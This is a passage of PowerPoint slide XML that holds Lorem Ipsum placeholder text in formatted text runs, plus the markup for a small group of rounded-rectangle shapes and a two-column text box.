              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tincidunt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> id </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nisl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>accumsan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>placerat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>velit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Nullam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sagittis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>feugiat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>erat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vestibulum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r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facilisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Duis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>molestie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>urna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>enim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>scelerisque</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>arcu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>feugiat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Curabitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lobortis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nulla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dignissim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>consequat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>odio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>libero</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pellentesque</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nunc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, sit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>amet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>feugiat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>justo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>neque</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Donec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> non ante ac </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>orci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>elementum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iaculis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>consequat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Interdum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>malesuada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> fames ac ante </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ipsum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>primis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>faucibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Mauris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>volutpat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>aliquet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>imperdiet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Suspendisse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ultrices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> lacus id </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>est</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>viverra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>porttitor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>facilisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Nullam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> dolor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sapien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>hendrerit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> sit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>amet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tellus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tristique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tempor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iaculis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>urna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Nulla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>aliquam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> magna. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Donec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>felis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>felis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lacinia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>porttitor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Proin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sollicitudin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ante id </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nisl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>imperdiet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Aenean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vestibulum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> non </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rutrum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Cras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>varius</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>condimentum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>,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euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>erat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pharetra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> non. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Sed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>blandit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> sem.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="101309" y="385540"/>
            <a:ext cx="383999" cy="342172"/>
            <a:chOff x="5270500" y="1460500"/>
            <a:chExt cx="1701800" cy="2705100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rounded Rectangle 8"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="52705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Rounded Rectangle 9"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="58928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Rounded Rectangle 10"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="65151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603251" y="1368898"/>
            <a:ext cx="10972800" cy="4889664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="95057" tIns="47529" rIns="95057" bIns="47529" numCol="2" spcCol="280728"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="just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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> non </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. Maecenas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> lacus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mauris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>feugiat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tristique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> et in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Duis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>congue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lectus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> semper semper. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Nullam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>finibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nisl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ligula </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vestibulum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
